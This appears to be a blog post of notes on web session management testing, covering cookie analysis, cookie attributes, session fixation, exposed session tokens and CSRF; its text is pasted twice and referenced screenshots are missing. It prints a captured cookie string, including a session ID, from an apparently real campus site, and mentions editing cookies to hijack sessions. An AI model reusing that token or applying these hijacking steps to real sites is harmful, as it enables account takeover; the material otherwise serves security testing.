Session Management Testing
1. Testing for Session Management Schema
This describes how to analyse a Session Management Schema, with the goal to understand how the Session Management
mechanism has been developed and if it is possible to break it to bypass the user session. It explains how to test the
security of session tokens issued to the client's browser: how to reverse engineer a cookie, and how to manipulate cookies
to hijack a session.
use addons Add & Edit cookies :
result :
2. Testing for Cookies attributes
Cookies are often a key attack vector for malicious users (typically, targeting other users) and, as such, the application
should always take due diligence to protect cookies. In this section, we will look at how an application can take the
necessary precautions when assigning cookies and how to test that these attributes have been correctly configured.
This Cookies atribut we found :
akakom_tpl=akakom; __utma=242819602.2057941145.1307427908.1307427908.1307430421.2; __utmz=242819602.1307427908.1.1.utmcsr=172.17.38.254|utmccn=(referral)|utmcmd=referral|utmcct=/login; __utmb=242819602.2.10.1307430421; 69cb2eb0a19889c0e172765110b05475=9hjssavtaja0476hriti01gt25; __utmc=242819602
3. Testing for Session Fixation
When an application does not renew the cookie after a successful user authentication, it could be possible to find a session
fixation vulnerability and force a user to utilize a cookie known to the attacker.
4. Testing for Exposed Session Variables
Session Tokens represent confidential information because they tie the user identity with his own session. It's possible to
test if the session token is exposed to this vulnerability and try to create a replay session attack.
5. Testing for CSRF
Cross Site Request Forgery describes a way to force an unknowing user to execute unwanted actions on a web application
in which he is currently authenticated. This section describes how to test an application to find this kind of vulnerability.
This describes how to analyse a Session Management Schema, with the goal to understand how the Session Management
mechanism has been developed and if it is possible to break it to bypass the user session. It explains how to test the
security of session tokens issued to the client's browser: how to reverse engineer a cookie, and how to manipulate cookies
to hijack a session.
use addons Add & Edit cookies :
result :
2. Testing for Cookies attributes
Cookies are often a key attack vector for malicious users (typically, targeting other users) and, as such, the application
should always take due diligence to protect cookies. In this section, we will look at how an application can take the
necessary precautions when assigning cookies and how to test that these attributes have been correctly configured.
This Cookies atribut we found :
akakom_tpl=akakom; __utma=242819602.2057941145.1307427908.1307427908.1307430421.2; __utmz=242819602.1307427908.1.1.utmcsr=172.17.38.254|utmccn=(referral)|utmcmd=referral|utmcct=/login; __utmb=242819602.2.10.1307430421; 69cb2eb0a19889c0e172765110b05475=9hjssavtaja0476hriti01gt25; __utmc=242819602
3. Testing for Session Fixation
When an application does not renew the cookie after a successful user authentication, it could be possible to find a session
fixation vulnerability and force a user to utilize a cookie known to the attacker.
4. Testing for Exposed Session Variables
Session Tokens represent confidential information because they tie the user identity with his own session. It's possible to
test if the session token is exposed to this vulnerability and try to create a replay session attack.
5. Testing for CSRF
Cross Site Request Forgery describes a way to force an unknowing user to execute unwanted actions on a web application
in which he is currently authenticated. This section describes how to test an application to find this kind of vulnerability.
Comments
Post a Comment